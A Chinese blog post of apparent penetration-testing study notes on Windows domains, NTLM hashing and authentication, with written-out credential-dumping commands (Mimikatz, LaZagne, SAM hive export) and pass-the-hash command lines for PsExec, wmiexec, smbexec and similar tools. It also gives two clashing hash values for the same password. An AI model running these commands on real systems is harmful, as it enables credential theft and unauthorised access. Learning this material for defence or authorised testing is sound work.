嗚嗚嗚,被佬批評了,這應該是上篇就要了解的板塊了,忘記啦QAQ
emmmm,先了解一下域環境和工作組環境的區別吧。其實之前就有寫過(小聲bb:忘記了)。
域和工作組的區別
1、域英文叫DOMAIN——域(Domain)是Windows網絡中獨立運行的單位,域之間相互訪問則需要建立信任關系(即Trust Relation)。信任關系是連接在域與域之間的橋梁。當一個域與其他域建立了信任關系后,2個域之間不但可以按需要相互進行管理,還可以跨網分配文件和打印機等設備資源,使不同的域之間實現網絡資源的共享與管理。
2、工作組(Work Group)是局域網中的一個概念。它是最常見最簡單最普通的資源管理模式,就是將不同的電腦按功能分別列入不同的組中,以方便管理。
1、域和工作組適用的環境不同,域一般是用在比較大的網絡里,工作組則較小,在一個域中需要一台類似服務器的計算機,叫域控服務器,其他電腦如果想互相訪問首先都是經過它的,但是工作組則不同,在一個工作組里的所有計算機都是對等的,也就是沒有服務器和客戶機之分的,但是和域一樣,如果一台計算機想訪問其他計算機的話首先也要找到這個組中的一台類似組控服務器,組控服務器不是固定的,以選舉的方式實現,它存儲着這個組的相關信息,找到這台計算機后得到組的信息然后訪問。
2、工作組是一群計算機的集合,它僅僅是一個邏輯的集合,各自計算機還是各自管理的,你要訪問其中的計算機,還是要到被訪問計算機上來實現用戶驗證的。而域不同,域是一個有安全邊界的計算機集合,在同一個域中的計算機彼此之間已經建立了信任關系,在域內訪問其他機器,不再需要被訪問機器的許可了。
0x01 NetBIOS
網絡基本輸入/輸出系統 (Network Basic Input/Output System, NetBIOS) 是一種標准的應用程序編程接口,NetBIOS名稱解析就是NetBIOS名稱映射到IP地址的過程。
nbtstat
查看本機IP
nbtstat -A 本機IP
nbtscan
附上系統城的下載鏈接:
windows版本:http://www.xitongzhijia.net/soft/195386.html
Windows版本
Linux版本
0x02 NT Lan Manager
NT Lan Manager的協議實現有Net-NTLMv1和Net-NTLMv2兩個版本,兩者響應值計算均使用了NT Hash。NTLM Hash 通常是指Windows系統下Security Account Manager數據庫中保存的用戶密碼的Hash 值,Windows 本身不保存明文密碼,只保留密碼的Hash,攻擊者利用獲取到的NTLM Hash可進行PTH攻擊。
NTLM Hash 生成原理
假設明文口令是"admin",首先將其進行十六進制轉換,結果為"61646d696e"。
admin -> hex = 61646d696e
將其轉換成Unicode字符串,結果為"610064006d0069006e00"。
61646d696e-> Unicode = 610064006d0069006e00
對獲取的Unicode字符串"610064006d0069006e00",進行標准MD4單向Hash運算,得到128bit的Hash值。
結果為"c477236e88a7ae62a59e54e444612724"
也就得到了最后的NTLM Hash。
610064006d0069006e00 -> MD4 = 209c6174da490caeb422f3fa5a7ae634
import hashlib
import binascii
Description = '''
NTLM計算過程
admin -> hex = 61646d696e
61646d696e-> Unicode = 610064006d0069006e00
610064006d0069006e00 -> MD4 = 209c6174da490caeb422f3fa5a7ae634
'''
print(Description)
Password = input('Your Password:')
hash = hashlib.new('md4',Password.encode('utf-16le')).digest()
hash_hex = binascii.hexlify(hash)
print('->' + str(hash_hex),'utf-8')
NTLM Hash 提取方式
Mimikatz
官網下載地址:https://blog.gentilkiwi.com/mimikatz
以管理員身份運行mimikaz
privilege::debug#提升權限
sekurlsa::logonpasswords#抓取密碼
即可得到相關的NTLM信息。
SafetyKatz
下載地址:https://github.com/ghostpack/safetykatz
找了半天也沒找到emmmm,直接用大佬的圖了
LaZagne
windows版下載地址:
https://github.com/AlessandroZ/LaZagne/releases/
lazagne.exe all
麻了麻了,下面的就直接丟佬的圖了
Reg
reg save hklm\sam C:\Users\Administrator\Desktop\sam.hive
reg save hklm\system C:\Users\Administrator\Desktop\system.hive
samdump2 system.hive sam.hive > ntlm_hash.txt
cat ntlm_hash.txt
0x03 認證過程
Windows Challenge/Response 認證過程
- 客戶端發送用戶名到服務器
- 客戶端對明文口令進行Hash處理獲得NTLM Hash
- 服務器生成一個 16字節的隨機數(Challenge)發送給客戶端
- 客戶端使用NTLM Hash對Challenge進行加密,加密結果為Response-C,然后將結果發送給服務器
- 服務器通過用戶名檢索到相對應的NTLM Hash並對Challenge進行加密得到Response-S。
- 比較Response-S和從客戶端接收到的Response-C,如果一致則認證通過。
0x04Windows認證過程
一般來說Winlogon服務針對本地計算機上的SAM安全賬戶數據庫來進行Windows憑據驗證。通過在登錄用戶界面上的用戶輸入等方式收集憑據,本地安全信息如策略設置、賬戶信息等一般存儲在注冊表HKEY_LOCAL_MACHINE\SECURITY中,SAM數據庫的備份也存在該注冊表中。
winlogon.exe是負責管理安全用戶交互的可執行文件,Winlogon服務通過將用戶在登錄桌面上輸入的用戶名口令信息通過Secur32.dll 傳遞給LSA服務后來啟動Windows操作系統的登錄過程。
lsass.exe主要對用戶進行身份驗證,將用戶口令轉化為NTLM Hash,同時將憑據信息存儲在內存中,用戶使用該憑據可訪問網絡資源等。
LSA憑據產生有如下幾種情況:
- 遠程桌面登錄
- 本地登錄
- 使用RunAs運行服務
- 運行計划任務或批處理
- 利用遠程管理工具在本地計算機運行服務
0x05 Pass The Hash
PASXEC
PsExec.exe \\target_ip -u username -p password cmd
PsExec.exe \\192.168.1.6 -u administrator -p Abcd1234 cmd.exe
WMIEXEC
cscript.exe wmiexec.vbs /cmd domain_name username password cmd
cscript.exe wmiexec.vbs /cmd WIN-78L42RBHLLO administrator admin123!@# "ipconfig"
ATEXEC
python atexec.py administrator:admin123!@#@192.168.3.133 ipconfig
SMBEXEC
python smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8f909fdb472d0b85cddb3e36669a9b07 administrator@192.168.3.133
DCOMEXEC
python dcomexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8f909fdb472d0b85cddb3e36669a9b07 administrator@192.168.3.133
感言:
咱就是說這些工具都還在么????咋一個個都找到wuwuwuwu
參考文章